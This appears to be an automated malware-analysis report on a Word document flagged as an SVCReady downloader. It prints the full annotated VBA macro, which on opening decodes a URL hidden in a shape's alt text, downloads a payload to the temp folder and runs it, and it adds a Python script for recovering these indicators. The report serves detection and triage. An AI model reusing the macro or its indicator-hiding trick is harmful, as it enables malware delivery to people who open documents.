Verdict: MALICIOUS (Risk Score 210)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a Word document carrying a VBA project whose AutoOpen routine runs as soon as the document is opened with macros enabled. The macro does not contain its own URL or command line: it reads both from the first floating shape in the document (ActiveDocument.Shapes(1).AlternativeText for the URL, Shapes(1).Title for the launcher program) and de-obfuscates each by keeping every third character. It then fetches the URL with a synchronous MSXML2.XMLHTTP60 GET, converts the response byte array with StrConv(..., 64) (vbUnicode) and writes it through Print # to %TMP%\main.theme (Print # writes the string back as ANSI bytes and appends a trailing CR LF), and finally runs "<launcher> %TMP%\main.theme" through WshShell.Exec rather than the intrinsic Shell() function. Both objects are early-bound (As New WshShell, New MSXML2.XMLHTTP60), so the project's reference list in vbaProject.bin names the Windows Script Host object model and MSXML 6 libraries, a static indicator in its own right. The remaining one-line functions, which read window or document properties or return constants, are padding and are never called. Because the indicators live in word/document.xml rather than in the macro, the URL and launcher have to be recovered from the descr and title attributes of the shape's wp:docPr element. The ClamAV detection Doc.Downloader.SVCReady corroborates the downloader classification; the file:// image relationship pointing at C:\Framework\rels\builds\pack2\us.jpg is most likely residue from the builder's environment rather than a live fetch, but it is a usable pivot for clustering related builds.
Heuristics (7)

- ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
- External relationship [high, OOXML_EXTERNAL_REL]: External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\us.jpg
- VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]: Document contains a VBA project — VBA macros present
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below is a standard Office Open XML or Microsoft Office schema namespace identifier, all reached through the "OOXML external relationship" channel. They name XML vocabularies, appear in benign documents saved by the same Word version, and are not network contact points; the only target worth pivoting on is the file:// path reported under OOXML_EXTERNAL_REL above.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (OOXML external relationship)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/ink (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (OOXML external relationship)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2012/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2018/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3034 bytes | d538e563ddf78fa997e0d432229c6963bf068a425b7fcdf497910850a5652860 |
Preview of macros.bas: the analyzer shows the first 1,000 lines of an extracted script, which here covers all 111 lines of the file.
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument holds no code. The working logic is in module f99f461a
' (AutoOpen), module cbcbdc0e (decoder, file writer, drop path) and the
' class module f29b5957 (HTTP download). The remaining functions read
' harmless Word properties or return constants and are never called.

Attribute VB_Name = "f99f461a"
Function b7b5c4bb()
    b7b5c4bb = ActiveWindow.Thumbnails          ' padding, never called
End Function
Function cb00873f()
    cb00873f = -28193                           ' padding, never called
End Function
Sub AutoOpen()
    ' Runs automatically when the document is opened with macros enabled.
    Dim f6fb0e08 As New f29b5957
    ' 1. URL: Shapes(1).AlternativeText, de-obfuscated by keeping every 3rd character.
    aaa = b11c5ad6(db1352d4)
    ' 2. Synchronous HTTP GET; the response body comes back as a byte array.
    c23b860a = f6fb0e08.bf1f654d(aaa, "")
    ' 3. Write the body to %TMP%\main.theme.
    a1a5848a ee772f65, c23b860a
    ' 4. Launcher program: Shapes(1).Title, de-obfuscated the same way.
    edbf5b4e = b11c5ad6(ActiveDocument.Shapes(1).Title)
    ' 5. Run "<launcher> %TMP%\main.theme" through WScript.Shell (early-bound
    '    reference to the Windows Script Host object model).
    Dim d6fedc24 As New WshShell
    d6fedc24.exec "" & edbf5b4e & " " & ee772f65
End Sub

Attribute VB_Name = "cbcbdc0e"
Function dd46016c()
    dd46016c = Application.ActiveDocument.Application   ' padding, never called
End Function
Function c503a09a()
    c503a09a = ActiveWindow.Creator             ' padding, never called
End Function
Sub a1a5848a(e159db16, dd8b196a)
    ' Write dd8b196a to the path e159db16. Print # writes the string as ANSI
    ' bytes, undoing the vbUnicode conversion below, and appends CR LF.
    Dim dc283f0c
    dc283f0c = FreeFile
    Open e159db16 For Output As #dc283f0c
    Print #dc283f0c, a5a3916b(dd8b196a)
    Close #dc283f0c
End Sub
Function ee772f65()
    ' Drop path for the downloaded payload.
    ee772f65 = Environ("tmp") & "\main.theme"
End Function
Function ba92bae2()
    ba92bae2 = "Libertarian confusingly warm louvres"   ' padding, never called
End Function
Function cc8cbc4d()
    cc8cbc4d = Application.ActiveDocument.Creator        ' padding, never called
End Function
Function b11c5ad6(a655946f)
    ' Decoder: Mid() is 1-based, so this keeps characters 1, 4, 7, ... and
    ' discards the two junk characters that follow each real one.
    For a80a1858 = 1 To Len(a655946f) Step 3
        b3f4034c = Mid(a655946f, a80a1858, 1)
        b5bdd232 = b5bdd232 & b3f4034c
    Next
    b11c5ad6 = b5bdd232
End Function
Function e9130a0a()
    e9130a0a = 28                               ' padding, never called
End Function
Function ff5517cc()
    ff5517cc = ActiveWindow.Visible             ' padding, never called
End Function
Sub b9ba7af0()
End Sub
Function c201cd3f()
    c201cd3f = ActiveWindow.Left                ' padding, never called
End Function
Function a1a9e1d8()
    a1a9e1d8 = 225926076 / 5524                 ' padding, never called
End Function
Function a5a3916b(dd8b196a)
    ' StrConv(..., 64) is vbUnicode: turns the response byte array into a
    ' String so that Print # can write it.
    a5a3916b = StrConv(dd8b196a, 64)
End Function
Function b7dc5c3b()
    b7dc5c3b = Application.ActiveDocument.AutoSaveOn     ' padding, never called
End Function
Function b465754b(d830b7d5np As String) As Boolean
    ' Dead code: never called, and only ever assigns the default False.
    If Len(d830b7d5np) > 802 Then
        b465754b = False
    End If
End Function
Function db1352d4()
    ' Source of the obfuscated URL: alt text of the first floating shape.
    db1352d4 = ActiveDocument.Shapes(1).AlternativeText
End Function

Attribute VB_Name = "f29b5957"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function c2f1cddb()
    c2f1cddb = "Cobblers"                       ' padding, never called
End Function
Function a4c005d1()
    a4c005d1 = Application.ActiveDocument.AutoSaveOn     ' padding, never called
End Function
Function bf1f654d(b2cead74, a25c7873)
    ' Synchronous GET of b2cead74 via MSXML 6 (early-bound); a25c7873 is unused.
    ' Returns responseBody, a byte array, not responseText.
    Dim e25ad0c3 As Object
    Set e25ad0c3 = New MSXML2.XMLHTTP60
    Call e25ad0c3.Open("GET", b2cead74, False)
    e25ad0c3.Send
    bf1f654d = e25ad0c3.responsebody
End Function
Function b997613d()
    b997613d = Application.ActiveDocument.ActiveThemeDisplayName   ' padding, never called
End Function
Function b634ee16()
    b634ee16 = ActiveWindow.HorizontalPercentScrolled    ' padding, never called
End Function
Function cbe86472(fd95eb8b)
End Function
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 23552 bytes | eef80ffe16775a920e536c57d8ef8330cfb9c36dae99d6e338e0e362a26d0b63 |
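Recovering the indicators from the package, as an added example (this is editorial code, not the analyzer's output and not part of the sample). The macro in macros.bas above takes its URL from ActiveDocument.Shapes(1).AlternativeText and its launcher from Shapes(1).Title and decodes both with b11c5ad6, i.e. Mid(s, i, 1) for i = 1, 4, 7, ..., so neither value is in the macro source: they sit in word/document.xml as the descr and title attributes of the shape's wp:docPr element. The script below reads them straight from the zip, applies the same every-third-character decode, reconstructs the command line AutoOpen would hand to WshShell.Exec, and lists the TargetMode="External" relationships that produced the OOXML_EXTERNAL_REL finding. Because the sample itself is not available here, it falls back to a constructed stand-in docx whose URL and launcher are placeholders (example.invalid, rundll32.exe) and whose one external relationship copies the path the analyzer reported; the function names, the "xy" padding and the placeholder values are assumptions of this example, not observations about the real document.

```python
"""Added triage helper; not the analyzer's code and not part of the sample."""
from __future__ import annotations

import io
import sys
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "wp": "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
    "r": "http://schemas.openxmlformats.org/package/2006/relationships",
}


def decode_every_third(s: str) -> str:
    """Replicates b11c5ad6(): For i = 1 To Len(s) Step 3 keeps Mid(s, i, 1),
    i.e. the characters at 0-based offsets 0, 3, 6, ..."""
    return s[::3]


def encode_every_third(s: str, pad: str = "xy") -> str:
    """Inverse, used only to build the constructed sample: two junk characters
    after every real one (the padding the real builder uses is unknown)."""
    return "".join(c + pad for c in s)


def shape_title_and_alt(docx_bytes: bytes) -> list[tuple[str, str]]:
    """(title, descr) for every floating shape's wp:docPr in word/document.xml,
    in document order. Shapes(1).Title / .AlternativeText are the title / descr
    attributes of the first one (docPr is a direct child of wp:anchor)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return [(d.get("title", ""), d.get("descr", ""))
            for d in root.iterfind(".//wp:anchor/wp:docPr", NS)]


def external_relationships(docx_bytes: bytes) -> list[str]:
    """Targets with TargetMode="External" in word/_rels/document.xml.rels."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    return [rel.get("Target", "") for rel in root.findall("r:Relationship", NS)
            if rel.get("TargetMode") == "External"]


def triage(docx_bytes: bytes) -> dict:
    """What AutoOpen would compute, derived statically without running it."""
    shapes = shape_title_and_alt(docx_bytes)
    title, alt = shapes[0] if shapes else ("", "")
    launcher = decode_every_third(title)
    return {
        "url": decode_every_third(alt),
        "launcher": launcher,
        "command_line": f"{launcher} %TMP%\\main.theme",   # ee772f65() drop path
        "external_targets": external_relationships(docx_bytes),
    }


def build_sample_docx(url: str, command: str) -> bytes:
    """Constructed stand-in for the sample: a minimal docx carrying the two
    obfuscated strings in the first floating shape's docPr, plus one external
    image relationship shaped like the one the analyzer flagged."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">'
        '<w:body><w:p><w:r><w:drawing><wp:anchor>'
        f'<wp:docPr id="1" name="Picture 1" title="{encode_every_third(command)}" '
        f'descr="{encode_every_third(url)}"/>'
        '</wp:anchor></w:drawing></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="file:///C:\\Framework\\rels\\builds\\pack2\\us.jpg" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python3 triage_docx.py sample.docx   (no argument: constructed stand-in)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_docx("http://example.invalid/theme.bin", "rundll32.exe")
    for key, value in triage(data).items():
        print(f"{key}: {value}")
```

Against a real document, compare the recovered URL and launcher with what the sandbox observed, and diff the list of external targets against the OOXML_EXTERNAL_REL line: a file:// image target that only makes sense on the builder's machine is a clustering pivot, while an http(s) target would be a second fetch channel worth its own detection.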